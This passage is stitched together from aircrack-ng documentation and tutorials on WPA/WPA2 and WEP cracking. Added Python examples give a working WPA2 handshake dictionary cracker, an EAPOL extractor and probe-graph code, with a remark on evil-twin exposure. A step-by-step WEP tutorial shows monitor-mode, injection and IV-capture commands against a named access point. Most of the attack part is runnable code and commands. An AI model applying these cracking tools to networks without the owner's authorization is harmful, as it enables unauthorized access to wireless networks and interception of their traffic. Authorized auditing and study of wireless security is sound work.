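    """Parse a classic pcap file into (linktype, [(ts_sec, ts_usec, frame), ...])."""
    magic, = struct.unpack_from("<I", blob, 0)
    end = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if end is None:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    linktype = struct.unpack_from(end + "HHiIII", blob, 4)[5]   # network field
    records, off = [], 24
    while off + 16 <= len(blob):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack_from(end + "IIII", blob, off)
        off += 16
        records.append((ts_sec, ts_usec, blob[off:off + incl_len]))
        off += incl_len
    return linktype, records


def write_pcap(linktype: int, records) -> bytes:
    """Serialise records back into a little-endian classic pcap file."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)]
    for ts_sec, ts_usec, frame in records:
        out.append(struct.pack("<IIII", ts_sec, ts_usec, len(frame), len(frame)) + frame)
    return b"".join(out)


def is_beacon_or_eapol(frame: bytes) -> bool:
    """Same decision as 'eapol || wlan.fc.type_subtype == 0x08' on a raw 802.11 frame."""
    if len(frame) < 24:
        return False
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    if ftype == 0 and subtype == 8:            # management frame, beacon
        return True
    if ftype != 2 or fc1 & 0x40:               # not a data frame, or Protected (encrypted payload)
        return False
    hdr = 24
    if fc1 & 0x03 == 0x03:                     # ToDS and FromDS: four-address header
        hdr += 6
    if subtype & 0x08:                         # QoS data: extra 2-byte QoS control field
        hdr += 2
    return frame[hdr:hdr + 8] == LLC_SNAP_EAPOL


def extract_handshake(blob: bytes) -> bytes:
    """Return a new pcap holding only the beacon and EAPOL frames of the input."""
    linktype, records = read_pcap(blob)
    if linktype != LINKTYPE_IEEE802_11:
        raise ValueError(f"expected link type 105 (IEEE 802.11), got {linktype}")
    return write_pcap(linktype, [r for r in records if is_beacon_or_eapol(r[2])])


# Constructed frames for the demonstration (addresses and contents are made up).
BSSID, STA, BCAST = bytes.fromhex("00146c7e4080"), bytes.fromhex("001122334455"), b"\xff" * 6


def _hdr(fc0, fc1, a1, a2, a3):
    """24-byte 802.11 header: frame control, duration, three addresses, sequence control."""
    return bytes([fc0, fc1]) + b"\x00\x00" + a1 + a2 + a3 + b"\x10\x00"


BEACON = _hdr(0x80, 0x00, BCAST, BSSID, BSSID) + b"\x00" * 8 + b"\x64\x00\x11\x04" + b"\x00\x05teddy"
EAPOL_MSG1 = (_hdr(0x08, 0x02, STA, BSSID, BSSID) + LLC_SNAP_EAPOL
              + bytes([2, 3, 0, 95]) + b"\x02\x00\x8a" + b"\x00" * 92)   # EAPOL-Key, 95-byte body
PROBE_REQ = _hdr(0x40, 0x00, BCAST, STA, BCAST) + b"\x00\x00"
ENCRYPTED_DATA = _hdr(0x08, 0x41, BSSID, STA, BSSID) + b"\x01\x00\x00\x20\x00\x00\x00\x00" + b"\xde\xad\xbe\xef" * 8
SAMPLE_PCAP = write_pcap(LINKTYPE_IEEE802_11,
                         [(1, 0, BEACON), (1, 100, PROBE_REQ), (1, 200, EAPOL_MSG1), (1, 300, ENCRYPTED_DATA)])

if __name__ == "__main__":
    # usage: python extract_eapol.py <input.cap> <output.cap>; no arguments runs the sample
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 2 else SAMPLE_PCAP
    out = extract_handshake(blob)
    (open(sys.argv[2], "wb") if len(sys.argv) > 2 else open("handshake-only.cap", "wb")).write(out)
    print(f"kept {len(read_pcap(out)[1])} of {len(read_pcap(blob)[1])} frames")
```

The Protected bit check matters in practice: once the handshake completes, the AP and client exchange encrypted data frames that also sit at ethertype offsets, and a filter that ignores the bit would have to trust whatever bytes the ciphertext happens to contain.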
Other Tips

To specify multiple capture files at a time you can either use a wildcard such as * or specify each file individually.

Examples:

    aircrack-ng -w password.lst wpa.cap wpa2.eapol.cap
    aircrack-ng *.ivs
    aircrack-ng something*.ivs

To specify multiple dictionaries at one time, enter them comma separated with no spaces.

Examples:

    aircrack-ng -w password.lst,secondlist.txt wpa2.eapol.cap
    aircrack-ng -w firstlist.txt,secondlist.txt,thirdlist.txt wpa2.eapol.cap

Aircrack-ng comes with a small dictionary called password.lst. The password.lst file is located in the test directory of the source files. This FAQ entry has a list of web sites where you can find extensive wordlists (dictionaries). Also see this thread on the Forum.

Determining the WPA/WPA2 passphrase is totally dependent on finding a dictionary entry which matches the passphrase. So a quality dictionary is very important. You can search the Internet for dictionaries to be used. There are many available.

The tutorials page has the following tutorial How to crack WPA/WPA2? which walks you through the steps in detail.

As you have seen, if there are multiple networks in your files you need to select which one you want to crack. Instead of manually doing a selection, you can specify which network you want by essid or bssid on the command line. This is done with the -e or -b parameters.

Another trick is to use John the Ripper to generate specific passwords for testing. Let's say you know the passphrase is the street name plus 3 digits. Create a custom rule set in JTR and run something like this:

 john --stdout --wordlist=specialrules.lst --rules | aircrack-ng -e test -a 2 -w - /root/capture/wpa.cap

Remember that valid passwords are 8 to 63 characters in length. Here is a handy command to ensure all passwords in a file meet this criteria:

 awk '{ if ((length($0) > 7) && (length($0) < 64)){ print $0 }}' inputfile

or

 grep -E '^.{8,63}$' < inputfile

Usage Troubleshooting
Error message "Please specify a dictionary (option -w)"

This means you have misspelt the file name of the dictionary or it is not in the current directory. If the dictionary is located in another directory, you must provide the full path to the dictionary.
Error message "fopen(dictionary)failed: No such file or directory"

This means you have misspelt the file name of the dictionary or it is not in the current directory. If the dictionary is located in another directory, you must provide the full path to the dictionary.
Negative votes

There will be times when key bytes will have negative values for votes. As part of the statistical analysis, there are safeguards built in which subtract votes for false positives. The idea is to cause the results to be more accurate. When you get a lot of negative votes, something is wrong. Typically this means you are trying to crack a dynamic key such as WPA/WPA2 or the WEP key changed while you were capturing the data. Remember, WPA/WPA2 can only be cracked via a dictionary technique. If the WEP key has changed, you will need to start gathering new data and start over again.
"An ESSID is required. Try option -e" message

You have successfully captured a handshake then when you run aircrack-ng, you get similar output:

 Opening wpa.cap
 Read 4 packets.
 
          #     BSSID                      ESSID                   ENCRYPTION
          1     00:13:10:F1:15:86                                WPA (1) handshake
 Choosing first network as target.
 
 An ESSID is required. Try option -e.

Solution: You need to specify the real essid, otherwise the key cannot be calculated, as the essid is used as salt when generating the pairwise master key (PMK) out of the pre-shared key (PSK).

Solution in practice: specify the real ESSID with -e <REAL_ESSID>, and aircrack-ng should find the passphrase.
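
To show why the ESSID matters, here is an added example (not aircrack-ng's code) that derives the PMK, the PTK and the EAPOL MIC the way aircrack-ng does for each candidate passphrase, then runs a small dictionary against a constructed message 2 of a WPA2 handshake. The MAC addresses, nonces and the bare EAPOL-Key frame are constructed for the example; the passphrase/ESSID pair is the one from the wpa.cap sample above, and the PBKDF2 step is checked against the published IEEE 802.11 test vector. With the wrong ESSID the correct passphrase is not found, which is exactly the hidden-ESSID failure described above.

```python
import hashlib
import hmac

MIC_OFFSET, NONCE_OFFSET = 81, 17      # field offsets inside an EAPOL-Key frame (4-byte EAPOL header included)


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes), per IEEE 802.11i.
    The ESSID is the salt: with a wrong or empty ESSID every candidate yields a wrong PMK."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA-PSK passphrases are 8 to 63 characters long")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def wpa_ptk(pmk, aa, spa, anonce, snonce) -> bytes:
    """PTK (the 'Transient Key' aircrack-ng prints) from PMK, both MACs and both nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol: bytes, wpa2: bool = True) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed (the 'EAPOL HMAC' line):
    HMAC-SHA1 truncated to 16 bytes for WPA2/AES, HMAC-MD5 for WPA/TKIP."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1 if wpa2 else hashlib.md5).digest()[:16]


def build_msg2(snonce: bytes, replay_counter: int = 1) -> bytes:
    """Constructed EAPOL-Key message 2 (supplicant -> AP) of a WPA2 handshake, MIC zeroed."""
    body = (bytes([2])                                # descriptor type 2: RSN
            + (0x010A).to_bytes(2, "big")             # key info: HMAC-SHA1-AES, pairwise, MIC present
            + (16).to_bytes(2, "big")                 # key length (CCMP)
            + replay_counter.to_bytes(8, "big")
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8    # nonce, IV, RSC, ID
            + b"\x00" * 16                            # MIC placeholder
            + (0).to_bytes(2, "big"))                 # key data length (RSN IE omitted)
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body


def handshake_fixture(ssid="test", passphrase="biscotte"):
    """Supplicant side: constructed MACs and nonces, the real passphrase, a computed MIC.
    An attacker sees everything returned here except the passphrase (messages 1 and 2)."""
    aa, spa = bytes.fromhex("000d93ebb08c"), bytes.fromhex("001122334455")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    msg2 = build_msg2(snonce)
    kck = wpa_ptk(wpa_pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return {"aa": aa, "spa": spa, "anonce": anonce,
            "snonce": msg2[NONCE_OFFSET:NONCE_OFFSET + 32],   # parsed back out of the frame
            "msg2": msg2, "mic": eapol_mic(kck, msg2)}


def crack(hs, wordlist, ssid):
    """aircrack-ng side: PMK -> PTK -> MIC for each candidate, stop on the first match."""
    for cand in wordlist:
        try:
            pmk = wpa_pmk(cand, ssid)
        except ValueError:                     # outside 8..63 characters, cannot be a WPA-PSK
            continue
        kck = wpa_ptk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["msg2"]), hs["mic"]):
            return cand
    return None


# Published test vector for the PMK step (IEEE Std 802.11-2004, Annex H.4).
IEEE_VECTOR = ("password", "IEEE",
               "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")
# Master Key shown in the KEY FOUND output above for wpa.cap (ESSID test, passphrase biscotte).
PAGE_MASTER_KEY = "CDD79A5ACFB070C7E9D1023B870285D639E430B32F31AA37AC825A55B55524EE"
```

The hex string returned by wpa_pmk(...).hex() is the form airdecap-ng -k accepts, so a PMK computed here (or the Master Key aircrack-ng prints) can decrypt a capture without re-entering the passphrase. For WPA (TKIP) handshakes pass wpa2=False to eapol_mic so the MIC is computed with HMAC-MD5.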
The PTW method does not work

One particularly important constraint is that it only works against ARP request/reply packets. It cannot be used against any other data packets. So even if your data capture file contains a large number of data packets, if there are insufficient ARP request/reply packets, it will not work. Using this technique, 64-bit WEP can be cracked with as few as 20,000 data packets and 128-bit WEP with 40,000 data packets. As well, it requires the full packet to be captured, meaning you cannot use the --ivs option when running airodump-ng. It also only works for 64 and 128 bit WEP encryption.
Error message "read(file header) failed: Success"

If you get the error message - read(file header) failed: Success or similar when running aircrack-ng, there is likely an input file with zero (0) bytes. The input file could be a .cap or .ivs file.

This is most likely to happen with wildcard input of many files such as:

 aircrack-ng -z -b XX:XX:XX:XX:XX:XX *.cap

Simply delete the files with zero bytes and run the command again.
WPA/WPA2 Handshake Analysis Fails

Capturing WPA/WPA2 handshakes can be very tricky. A capture file may end up containing a subset of packets from various handshake attempts and/or handshakes from more than one client. Currently aircrack-ng can sometimes fail to parse out the handshake properly. What this means is that aircrack-ng will fail to find a handshake in the capture file even though one exists.

If you are sure your capture file contains a valid handshake then use Wireshark or an equivalent piece of software and manually pull out the beacon packet plus a set of handshake packets. 

################################################################

Aigraph-ng

Author: digitalpsyko, TheX1le
Version: 1.01
Last modified on: 23/5/2010
Requirements

    python
    graphviz
    make
    aircrack-ng 1.0 (rc2 or better is recommended)
    psyco is recommended but not mandatory

Installing

git clone http://github.com/aircrack-ng/aircrack-ng
cd aircrack-ng
autoreconf -i
./configure
cd scripts/airgraph-ng
make install

Graph types

    CAPR: Client to AP Relationship. This shows all the clients attached to a particular AP.
    CPG: Common Probe Graph. This will show all probed SSID by clients.
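
To make the two graph types concrete, here is an added example (not airgraph-ng's own code) that parses the airodump-ng CSV format and builds the same two relationships, emitting Graphviz DOT text that dot can render. The CSV sample is constructed; column positions follow the two airodump-ng header lines (the AP table and the "Station MAC" table), stations are tied to an AP through their BSSID column, and ESSIDs containing commas are not handled.

```python
from collections import defaultdict

# Constructed airodump-ng style CSV (not a real capture): two APs, three stations.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:14:6C:7E:40:80, 2009-09-25 10:00:00, 2009-09-25 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  120,     0,   0.  0.  0.  0,   5, teddy, 
00:0D:93:EB:B0:8C, 2009-09-25 10:00:00, 2009-09-25 10:05:00, 11,  54, WEP , WEP ,    , -60,   80, 30680,   0.  0.  0.  0,   4, test, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2009-09-25 10:00:10, 2009-09-25 10:04:00, -50,   30, 00:14:6C:7E:40:80, teddy,linksys
66:77:88:99:AA:BB, 2009-09-25 10:01:00, 2009-09-25 10:04:30, -70,   12, (not associated) , coffee,teddy
CC:DD:EE:FF:00:11, 2009-09-25 10:02:00, 2009-09-25 10:03:00, -55,    5, 00:0D:93:EB:B0:8C, 
"""


def parse_airodump_csv(text: str):
    """Return ({bssid: {essid, privacy, channel}}, [{mac, bssid, probes}, ...])."""
    aps, stations, section = {}, [], None
    for line in text.splitlines():
        if not line.strip():
            continue                                # blank line separates the two tables
        cols = [c.strip() for c in line.split(",")]
        if cols[0] == "BSSID":
            section = "ap"
        elif cols[0] == "Station MAC":
            section = "sta"
        elif section == "ap" and len(cols) >= 14:
            aps[cols[0]] = {"essid": cols[13], "privacy": cols[5], "channel": cols[3]}
        elif section == "sta" and len(cols) >= 6:
            # Probed ESSIDs is the last column but is itself comma separated.
            stations.append({"mac": cols[0], "bssid": cols[5],
                             "probes": [p for p in cols[6:] if p]})
    return aps, stations


def capr(stations):
    """Client to AP Relationship: associated clients grouped by BSSID."""
    rel = defaultdict(list)
    for s in stations:
        if s["bssid"] != "(not associated)":
            rel[s["bssid"]].append(s["mac"])
    return dict(rel)


def cpg(stations):
    """Common Probe Graph: probed ESSID -> clients that asked for it (associated or not)."""
    rel = defaultdict(list)
    for s in stations:
        for probe in s["probes"]:
            rel[probe].append(s["mac"])
    return dict(rel)


def to_dot(aps, stations, graph="CAPR") -> str:
    """Undirected Graphviz graph; render with: dot -Tpng demo.dot -o demo.png"""
    lines = ["graph airgraph {"]
    if graph == "CAPR":
        for bssid, clients in capr(stations).items():
            essid = aps.get(bssid, {}).get("essid", "?")
            lines.append(f'  "{bssid}" [label="{essid}\\n{bssid}" shape=box];')
            lines.extend(f'  "{c}" -- "{bssid}";' for c in clients)
    else:
        for probe, clients in cpg(stations).items():
            lines.append(f'  "{probe}" [shape=box];')
            lines.extend(f'  "{c}" -- "{probe}";' for c in clients)
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    print(to_dot(aps, stations, "CAPR"))
    print(to_dot(aps, stations, "CPG"))
```

The CPG output is the one worth staring at during an assessment: a client probing for an ESSID that is not on the air will happily associate to an evil twin with that name, and the unassociated station in the sample shows exactly that exposure.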

Usage
Help screen

############################################
#         Welcome to Airgraph-ng           #
############################################

Usage: python airgraph-ng -i [airodumpfile.txt] -o [outputfile.png] -g [CAPR OR CPG]

-i      Input File
-o      Output File
-g      Graph Type [CAPR (Client to AP Relationship) OR CPG (Common probe graph)]
-a      Print the about
-h      Print this help

Creating graphs

Now that you have airgraph-ng installed, run some airodump-ng CSV files through it to see the graphs it creates. Open a terminal and cd into the directory holding your airodump-ng .txt/.csv files.

The following creates a Client to Access point Relationship Graph

airgraph-ng -i demo.csv -o demo.png -g CAPR

The following creates a Common Probe Graph (which SSIDs each client probed for)

airgraph-ng -i demo.csv -o demo.png -g CPG

The graph size and the time to generate it depends on the size of your CSV file. So, the more AP's and Clients you get with airodump-ng the bigger the graph it will be.
Combining CSV files

To combine your airodump-ng .txt/.csv files together simply open up a terminal and cd into the directory where you're keeping them in and then type:

dump-join.py -i <file>.txt <file>.txt <file>.txt -o <outputfilename>.txt  

Now you can take your combined airodump-ng .txt/.csv files and run it through airgraph-ng to make a larger graph.
Troubleshooting
Airodump-ng doesn't create .txt files anymore

Starting from aircrack-ng 1.0rc3, .txt files were renamed to .csv.
I get 'Psyco optimizer not installed, You may want to download and install it!'

This is just a warning and you can safely ignore this message. However, it is recommended to install psyco because it speeds up execution of python code.

################################################################

Airdecap-ng
Description

With airdecap-ng you can decrypt WEP/WPA/WPA2 capture files. As well, it can also be used to strip the wireless headers from an unencrypted wireless capture.

It outputs a new file ending with -dec.cap which is the decrypted/stripped version of the input file.
Usage

airdecap-ng [options] <pcap file>

 Option  Param.  Description
 -l              don't remove the 802.11 header
 -b      bssid   access point MAC address filter
 -k      pmk     WPA/WPA2 Pairwise Master Key in hex
 -e      essid   target network ASCII identifier
 -p      pass    target network WPA/WPA2 passphrase
 -w      key     target network WEP key in hexadecimal

Wildcards may be used in the input file name, provided the pattern matches only a single file. In general, it is recommended that you use a single file name as input rather than a wildcard.
Usage Examples

The following removes the wireless headers from an open network (no WEP) capture:

airdecap-ng -b 00:09:5B:10:BC:5A open-network.cap

The following decrypts a WEP-encrypted capture using a hexadecimal WEP key:

airdecap-ng -w 11A3E229084349BC25D97E2939 wep.cap

The following decrypts a WPA/WPA2 encrypted capture using the passphrase:

airdecap-ng -e 'the ssid' -p passphrase  tkip.cap

Usage Tips
WPA/WPA2 Requirements

The capture file must contain a valid four-way handshake. For this purpose, having packets 2 and 3, or packets 3 and 4, is sufficient; you do not need all four handshake packets.

Also, only data packets captured after the handshake will be decrypted, because the keying material needed to decrypt them is derived from the handshake.
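The two requirements above can be checked on a capture before running airdecap-ng. The following Python, an added example that is not part of aircrack-ng, classifies EAPOL-Key frames into handshake messages 1 to 4 from their Key Information bits, reports whether a usable pair (2 and 3, or 3 and 4) is present, and counts how many data frames come after that point. It works on EAPOL-Key frame bodies (what follows the LLC/SNAP header), not on a whole pcap, and the four handshake frames in it are constructed, not captured.

```python
"""Check a capture against the airdecap-ng WPA/WPA2 handshake rule.

Added example, not aircrack-ng code. It works on EAPOL-Key frame bodies (what
follows the LLC/SNAP header of an 802.11 data frame), not on a whole pcap,
and every frame below is constructed sample data.
"""
import struct

# Key Information bits of the EAPOL-Key descriptor (IEEE 802.11i).
KEY_INFO_INSTALL = 0x0040
KEY_INFO_ACK = 0x0080
KEY_INFO_MIC = 0x0100
KEY_INFO_SECURE = 0x0200

EAPOL_TYPE_KEY = 3
EAPOL_HDR = struct.Struct("!BBH")  # protocol version, packet type, body length
# Fixed 95-byte part of the descriptor: descriptor type, key info, key length,
# replay counter, nonce, IV, RSC, reserved, MIC, key data length.
KEY_FIXED = struct.Struct("!BHHQ32s16sQQ16sH")


def parse_eapol_key(frame):
    """Decode the fields of one EAPOL-Key frame that the check needs."""
    _version, etype, body_len = EAPOL_HDR.unpack_from(frame, 0)
    if etype != EAPOL_TYPE_KEY:
        raise ValueError("not an EAPOL-Key frame")
    if EAPOL_HDR.size + body_len > len(frame):
        raise ValueError("truncated EAPOL frame")
    (_desc, key_info, _key_len, replay, nonce, _iv, _rsc, _rsvd, mic,
     data_len) = KEY_FIXED.unpack_from(frame, EAPOL_HDR.size)
    start = EAPOL_HDR.size + KEY_FIXED.size
    key_data = frame[start:start + data_len]
    if len(key_data) != data_len:
        raise ValueError("truncated key data")
    return {"key_info": key_info, "replay": replay, "nonce": nonce,
            "mic": mic, "key_data": key_data}


def message_number(parsed):
    """Map a parsed EAPOL-Key frame to handshake message 1, 2, 3 or 4.

    The AP's frames carry ACK (M3 also Install); the client's carry MIC
    without ACK. Under WPA2 M4 sets Secure; under WPA (TKIP) only M2 carries
    key data (the client's RSN/WPA IE), the heuristic used here.
    """
    info = parsed["key_info"]
    ack, mic = bool(info & KEY_INFO_ACK), bool(info & KEY_INFO_MIC)
    if ack and not mic:
        return 1
    if ack and mic and info & KEY_INFO_INSTALL:
        return 3
    if mic and not ack:
        return 4 if (info & KEY_INFO_SECURE or not parsed["key_data"]) else 2
    raise ValueError("unrecognised Key Information 0x%04x" % info)


def handshake_usable(messages):
    """The airdecap-ng rule: messages (2 and 3) or (3 and 4) are enough."""
    present = set(messages)
    return {2, 3} <= present or {3, 4} <= present


def count_decryptable_data(capture):
    """Split a capture's data frames into (decryptable, lost) counts.

    `capture` lists ("eapol", frame_bytes) or ("data", None) in capture order.
    Data frames are protected with the PTK the handshake establishes, so only
    those seen after a usable pair of handshake messages can be decrypted.
    """
    seen, decryptable, lost = [], 0, 0
    for kind, payload in capture:
        if kind == "eapol":
            seen.append(message_number(parse_eapol_key(payload)))
        elif handshake_usable(seen):
            decryptable += 1
        else:
            lost += 1
    return decryptable, lost


def build_key_frame(key_info, replay, nonce=b"\x00" * 32, key_data=b""):
    """Construct a minimal EAPOL-Key frame (sample data, not a real capture)."""
    body = KEY_FIXED.pack(2, key_info, 16, replay, nonce, b"\x00" * 16, 0, 0,
                          b"\x00" * 16, len(key_data)) + key_data
    return EAPOL_HDR.pack(2, EAPOL_TYPE_KEY, len(body)) + body


# Constructed WPA2 four-way handshake. Key Information = descriptor version 2
# (0x0002) | Pairwise (0x0008) | the bits above; M3 also sets Encrypted Key
# Data (0x1000). Nonces and key data are dummy bytes of the right length.
M1 = build_key_frame(0x008A, 1, nonce=b"A" * 32)
M2 = build_key_frame(0x010A, 1, nonce=b"S" * 32, key_data=b"\x30\x14" + b"\x00" * 20)
M3 = build_key_frame(0x13CA, 2, nonce=b"A" * 32, key_data=b"\x00" * 24)
M4 = build_key_frame(0x030A, 2)
SAMPLE_CAPTURE = [("data", None), ("eapol", M1), ("eapol", M2), ("eapol", M3),
                  ("data", None), ("eapol", M4), ("data", None), ("data", None)]

if __name__ == "__main__":
    print("decryptable/lost data frames:", count_decryptable_data(SAMPLE_CAPTURE))
```

In the sample capture the one data frame before the handshake is lost and the three after message 3 are decryptable, matching the two rules above.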
How to use spaces, double quote and single quote in AP names?

################################################################
Tutorial: Simple WEP Crack

Version: 1.20 January 11, 2010
By: darkAudax
Introduction

This tutorial walks you through a very simple case to crack a WEP key. It is intended to build your basic skills and get you familiar with the concepts. It assumes you have a working wireless card with drivers already patched for injection.

The basic concept behind this tutorial is using aireplay-ng to replay an ARP packet in order to generate new unique IVs. In turn, aircrack-ng uses the new unique IVs to crack the WEP key. It is important to understand what an ARP packet is. The "What is an ARP?" section provides the details.

For a start to finish newbie guide, see the Linux Newbie Guide. Although this tutorial does not cover all the steps, it does attempt to provide much more detailed examples of the steps to actually crack a WEP key plus explain the reason and background of each step. For more information on installing aircrack-ng, see Installing Aircrack-ng, and for installing drivers see Installing Drivers.

It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.

Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome.
Assumptions

First, this solution assumes:

    You are using drivers patched for injection. Use the injection test to confirm your card can inject prior to proceeding.
    You are physically close enough to send and receive access point packets. Remember that just because you can receive packets from the access point does not mean you will be able to transmit packets to the AP. The wireless card strength is typically less than the AP strength. So you have to be physically close enough for your transmitted packets to reach and be received by the AP. You should confirm that you can communicate with the specific AP by following these instructions.
    There is at least one wired or wireless client connected to the network and it is active. The reason is that this tutorial depends on receiving at least one ARP request packet, and if there are no active clients then there will never be any ARP request packets.
    You are using v0.9 of aircrack-ng. If you use a different version then some of the common options may have to be changed.

Ensure all of the above assumptions are true, otherwise the advice that follows will not work. In the examples below, you will need to change ath0 to the interface name which is specific to your wireless card.
Equipment used

In this tutorial, here is what was used:

    MAC address of PC running aircrack-ng suite: 00:0F:B5:88:AC:82
    BSSID (MAC address of access point): 00:14:6C:7E:40:80
    ESSID (Wireless network name): teddy
    Access point channel: 9
    Wireless interface: ath0

You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network.
Solution
Solution Overview

To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.

Once we have captured a large number of IVs, we can use them to determine the WEP key.

Here are the basic steps we will be going through:

    Start the wireless interface in monitor mode on the specific AP channel
    Test the injection capability of the wireless device to the AP
    Use aireplay-ng to do a fake authentication with the access point
    Start airodump-ng on AP channel with a bssid filter to collect the new unique IVs
    Start aireplay-ng in ARP request replay mode to inject packets
    Run aircrack-ng to crack key using the IVs collected

Step 1 - Start the wireless interface in monitor mode on AP channel

The purpose of this step is to put your card into what is called monitor mode. Monitor mode is the mode whereby your card can listen to every packet in the air. Normally your card will only hear packets addressed to you. By hearing every packet, we can later select some for injection. Also, with rare exceptions, only monitor mode allows you to inject packets. (Note: this procedure is different for non-Atheros cards.)

First stop ath0 by entering:

 airmon-ng stop ath0   

The system responds:

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Enter iwconfig to ensure there are no other athX interfaces. It should look similar to this:

 lo        no wireless extensions.
 
 eth0      no wireless extensions.
 
 wifi0     no wireless extensions.

If there are any remaining athX interfaces, then stop each one. When you are finished, run iwconfig to ensure there are none left.

Now, enter the following command to start the wireless card on channel 9 in monitor mode:

 airmon-ng start wifi0 9

Substitute the channel number that your AP runs on for 9 in the command above. This is important. You must have your wireless card locked to the AP channel for the following steps in this tutorial to work correctly.

Note: In this command we use wifi0 instead of our wireless interface of ath0. This is because the madwifi-ng drivers are being used. For other drivers, use the wireless interface name. Examples: wlan0 or rausb0.

The system will respond:

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

You will notice that ath0 is reported above as being put into monitor mode.

To confirm the interface is properly setup, enter iwconfig.

The system will respond:

 lo        no wireless extensions.
 
 wifi0     no wireless extensions.
 
 eth0      no wireless extensions.
 
 ath0      IEEE 802.11g  ESSID:""  Nickname:""
        Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   
        Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  
        Retry:off   RTS thr:off   Fragment thr:off
        Encryption key:off
        Power Management:off
        Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
        Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
        Tx excessive retries:0  Invalid misc:0   Missed beacon:0

In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9, and the Access Point field shows the MAC address of your wireless card. Please note that only the madwifi-ng drivers show the MAC address of your wireless card there; other drivers do not. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.

To match the frequency to the channel, check out: http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 . This will give you the frequency for each channel.
Step 2 - Test Wireless Device Packet Injection

The purpose of this step is to ensure that your card is within range of your AP and can inject packets to it.

Enter:

 aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0

Where:

    -9 means injection test
    -e teddy is the wireless network name
    -a 00:14:6C:7E:40:80 is the access point MAC address
    ath0 is the wireless interface name

The system should respond with:

 09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
 09:23:35  Trying broadcast probe requests...
 09:23:35  Injection is working!
 09:23:37  Found 1 AP 
 
 09:23:37  Trying directed probe requests...
 09:23:37  00:14:6C:7E:40:80 - channel: 9 - 'teddy'
 09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
 09:23:39  30/30: 100%

The last line is important. Ideally it should say 100% or a very high percentage. If it is low then you are too far away from the AP or too close. If it is zero then injection is not working and you need to patch your drivers or use different drivers.

See the injection test for more details.
Step 3 - Start airodump-ng to capture the IVs

The purpose of this step is to capture the IVs generated. This step starts airodump-ng to capture the IVs from the specific access point.

Open another console session to capture the generated IVs. Then enter:

 airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0

Where:

    -c 9 is the channel for the wireless network
    --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
    -w output is the file name prefix for the file which will contain the IVs.
    ath0 is the interface name.

While the injection is taking place (later), the screen will look similar to this:

 CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 
                                                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                            
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           
                                                                                                            
 BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                            
